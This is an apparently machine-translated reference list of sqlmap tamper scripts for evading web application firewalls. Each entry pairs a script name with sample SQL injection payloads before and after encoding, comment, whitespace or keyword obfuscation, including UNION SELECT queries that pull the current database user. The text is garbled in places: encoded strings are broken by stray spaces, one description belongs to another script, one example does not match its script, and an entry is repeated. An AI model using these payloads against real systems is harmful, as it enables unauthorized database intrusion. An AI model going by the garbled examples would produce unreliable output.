se tamper script in Sqlmap to bypass WAF script name: 0x2char.py
function: Replace the apostrophe character with the UTF-8 full-width corresponding character
Function: With equivalent concat (CHAR (), ... Corresponds to replacing each (MySQL) 0x
Test object:
MySQL 4,5.0 and 5.5
>>> tamper (‘SELECT 0xdeadbeef’)
‘SELECT CONCAT (CHAR (222), CHAR (173), CHAR (190), CHAR (239))’
Script name: apostrophemask.py
Function: Replace apostrophe characters with UTF-8 full-width corresponding characters
>>> tamper ("1 AND‘ 1 ‘=‘ 1 ")
‘1 AND% EF% BC% 871% EF% BC% 87 =% EF% BC% 871’
Script name: apostrophenullencode.py
Role: replace the apostrophe character with its illegal double byte
>>> tamper ("1 AND‘ 1 ‘=‘ 1 ")
‘1 AND% 00% 271% 00% 27 =% 00% 271’
Script name: appendnullbyte.py
Role: append encoded null byte characters at the end of the payload
demand:
Microsoft Access
notes:
Used to bypass the weak web application firewall in the backend
The database management system is Microsoft Access
>>> tamper (‘1 AND 1 = 1‘)
‘1 AND 1 = 1% 00’
Script name: base64encode.py
Role: replace with base64 encoding
>>> tamper ("1‘ AND SLEEP (5) # ")
‘MScgQU5EIFNMRUVQKDUpIw ==’
Script name: between.py
effect:
Use ‘NOT BETWEEN 0 AND #’ instead of greater than operator (‘>’)
Replace the equal sign operator with ‘BETWEEN # AND #’ (‘=’)
testing object:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
notes:
Effectively bypass weak web application firewall filtering greater than characters
The BETWEEN clause is the SQL standard. Therefore, this tampering script should target all databases
>>> tamper (‘1 AND A> B--‘)
‘1 AND A NOT BETWEEN 0 AND B--’
>>> tamper (‘1 AND A = B--‘)
‘1 AND A BETWEEN B AND B--’
Script name: bluecoat.py
Role: replace the space character after the SQL statement with a valid random white space character, and then replace the character ‘=’ with the operator LIKE
demand:
Blue Coat SGOS activated by WAF as stated in the WAF file
testing object:
MySQL 5.1, SGOS
notes:
Used to bypass the WAF rule configuration recommended by Blue Coat
>>> tamper (‘SELECT id FROM users WHERE id = 1‘)
‘SELECT% 09id FROM% 09users WHERE% 09id LIKE 1’
Script name: chardoubleencode.py
Purpose: Double URL encodes all characters in a given payload (does not process already encoded)
>>> tamper (‘SELECT FIELD FROM% 20TABLE’)
'% 2553% 2545% 254C% 2545% 2543% 2554% 2520% 2546% 2549% 2545% 254C% 2544% 2520% 2546% 2552% 254F% 254D% 2520% 2554% 2541% 2542% 254C% 2545'
Script name: charencode.py
Role: Url encodes all characters in a given payload (no encoding yet processed)
testing object:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
notes:
Very useful, can bypass very weak web application firewall to decode the request before processing the request through its rule set
The web server will decode by url anyway, so it should be valid for any DBMS
>>> tamper (‘SELECT FIELD FROM% 20TABLE’)
‘% 53% 45% 4C% 45% 43% 54% 20% 46% 49% 45% 4C% 44% 20% 46% 52% 4F% 4D% 20% 54% 41% 42% 4C% 45’
Script name: charunicodeencode.py
Role: string unicode encoding
>>> tamper (‘SELECT FIELD% 20FROM TABLE’)
‘% U0053% u0045% u004C% u0045% u0043% u0054% u0020% u0046% u0049% u0045% u004C% u0044% u0020% u0046% u0052% u004F% u004D% u0020% u0054% u0041% u0042% u004C% u0045’
Script name: equaltolike.py
Function: like instead of equal sign
>>> tamper (‘SELECT * FROM users WHERE id = 1‘)
‘SELECT * FROM users WHERE id LIKE 1’
Script name: space2dash.py
Function: bypass the filter ‘=’ and replace the space character (”), (’ – ‘) followed by a dash comment, a random string and a new line (’ n ’)
>>> tamper (‘1 AND 9227 = 9227‘)
‘1--nVNaVoPYeva% 0AAND--ngNvzqu% 0A9227 = 9227’
Script name: greatest.py
Effect: bypass the filter ’>’ and replace greater-than sign with GREATEST.
>>> tamper (‘1 AND A> B’)
‘1 AND GREATEST (A, B + 1) = A’ Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
Script name: space2hash.py
Function: replace spaces with # sign, random string, and newline
>>> tamper (‘1 AND 9227 = 9227‘)
‘1% 23nVNaVoPYeva% 0AAND% 23ngNvzqu% 0A9227 = 9227’
Script name: halfversionedmorekeywords.py
Role: bypass the firewall when the database is mysql, add a mysql version comment before each keyword
tamper ("value 'UNION ALL SELECT CONCAT (CHAR (58,107,112,113,58), IFNULL (CAST (CURRENT_USER () AS CHAR), CHAR (32)), CHAR (58,97,110,121,58)), NULL, NULL # AND' QDWa '=' QDWa ")
"value '/ *! 0UNION / *! 0ALL / *! 0SELECT / *! 0CONCAT (/ *! 0CHAR (58,107,112,113,58), / *! 0IFNULL (CAST (/ *! 0CURRENT_USER () / *! 0AS / *! 0CHAR), / *! 0CHAR (32)), / *! 0CHAR (58,97,110,121,58)), / *! 0NULL, / *! 0NULL # / *! 0AND 'QDWa' = 'QDWa "
Script name: space2morehash.py
Function: replace spaces with # sign and more random strings
>>> tamper (‘1 AND 9227 = 9227‘)
‘1% 23ngNvzqu% 0AAND% 23nVNaVoPYeva% 0A% 23lujYFWfv% 0A9227 = 9227’
Script name: ifnull2ifisnull.py
Effect: Bypass filtering of IFNULL. Replace ‘IFNULL (A, B)’ with ‘IF (ISNULL (A), B, A)’
>>> tamper (‘IFNULL (1, 2)’)
‘IF (ISNULL (1), 2,1)’
Script name: space2mssqlblank.py (mssql)
Role: Replace spaces with other empty symbols
>>> tamper (‘SELECT id FROM users’)
‘SELECT% A0id% 0BFROM% 0Cusers’
Script name: space2mssqlhash.py
Role: replace spaces
>>> tamper (‘1 AND 9227 = 9227‘)
‘1% 23% 0AAND% 23% 0A9227 = 9227’
Script name: modsecurityversioned.py
Function: filter spaces, including complete query version notes
>>> tamper (‘1 AND 2> 1--‘)
‘1 / *! 30874AND 2> 1 * /-‘
Script name: space2mysqlblank.py
Role: space to replace other blank symbols (mysql)
>>> tamper (‘SELECT id FROM users’)
‘SELECT% A0id% 0BFROM% 0Cusers’
Script name: space2mysqldash.py
What it does: Replace the space character (") (’ – ‘) followed by a dash to comment a new line (’ n ’)
Note: There was a mssql before, this is mysql
>>> tamper (‘1 AND 9227 = 9227‘)
‘1-% 0AAND-% 0A9227 = 9227’
Script name: multiplespaces.py
Role: Add multiple spaces around SQL keywords
>>> tamper (‘1 UNION SELECT foobar’)
‘1 UNION SELECT foobar’
Script name: space2plus.py
Role: replace spaces with +
>>> tamper (‘SELECT id FROM users’)
‘SELECT + id + FROM + users’
Script name: nonrecursivereplacement.py
Role: Double query statement. Replace the predefined SQL keyword with to indicate suitable for replacement (eg .replace ("SELECT", "")) filters
>>> tamper (‘1 UNION SELECT 2--‘)
‘1 UNIOUNIONN SELESELECTCT 2--‘
Script name: space2randomblank.py
Effect: Instead of the space character (""), a valid set of optional characters from a random white space character
>>> tamper (‘SELECT id FROM users’)
‘SELECT% 0Did% 0DFROM% 0Ausers’
Script name: sp_password.py
Purpose: Append sp_password ’from the end of the automatically obfuscated payload of the DBMS log
>>> tamper (‘1 AND 9227 = 9227--‘)
‘1 AND 9227 = 9227-- sp_password’
Script name: unionalltounion.py
Role: replace UNION ALL SELECT with UNION SELECT
>>> tamper (‘-1 UNION ALL SELECT’)
‘-1 UNION SELECT’
Script name: randomcase.py
Role: random case
>>> tamper (‘INSERT’)
‘INseRt’
Script name: unmagicquotes.py
Purpose: Wide characters bypass GPC addslashes
>>> tamper ("1‘ AND 1 = 1 ")
‘1% bf% 27--‘
Script name: randomcomments.py
Role: use / ** / to split the sql keyword
>>> tamper (‘INSERT’)
‘I / ** / N / ** / SERT’
Script name: securesphere.py
Role: Append a special string
>>> tamper (‘1 AND 1 = 1‘)
"1 AND 1 = 1 and‘ 0having ‘=‘ 0having ’"
Script name: versionedmorekeywords.py
Purpose: Note bypass
>>> tamper (‘1 UNION ALL SELECT NULL, NULL, CONCAT (CHAR (58,122,114,115,58), IFNULL (CAST (CURRENT_USER () AS CHAR), CHAR (32)), CHAR (58,115,114,121,58)) # ‘)
'1 / *! UNION * // *! ALL * // *! SELECT * // *! NULL * /, / *! NULL * /, / *! CONCAT * / (/ *! CHAR * / (58,122,114,115, 58), / *! IFNULL * / (CAST (/ *! CURRENT_USER * / () / *! AS * // *! CHAR * /), / *! CHAR * / (32)), / *! CHAR * / (58,115,114,121,58)) # '
Script name: space2comment.py
Role: Use comments to replace space characters
>>> tamper (‘SELECT id FROM users’)
‘SELECT / ** / id / ** / FROM / ** / users’
Script name: halfversionedmorekeywords.py
Function: add comments before keywords
>>> tamper ("value 'UNION ALL SELECT CONCAT (CHAR (58,107,112,113,58), IFNULL (CAST (CURRENT_USER () AS CHAR), CHAR (32)), CHAR (58,97,110,121,58)), NULL, NULL # AND 'QDWa' = 'QDWa ")
"value '/ *! 0UNION / *! 0ALL / *! 0SELECT / *! 0CONCAT (/ *! 0CHAR (58,107,112,113,58), / *! 0IFNULL (CAST (/ *! 0CURRENT_USER () / *! 0AS / *! 0CHAR), / *! 0CHAR (32)), / *! 0CHAR (58,97,110,121,58)), / *! 0NULL, / *! 0NULL # / *! 0AND 'QDWa' = 'QDWa "
Use tamper script in sqlmap to bypass waf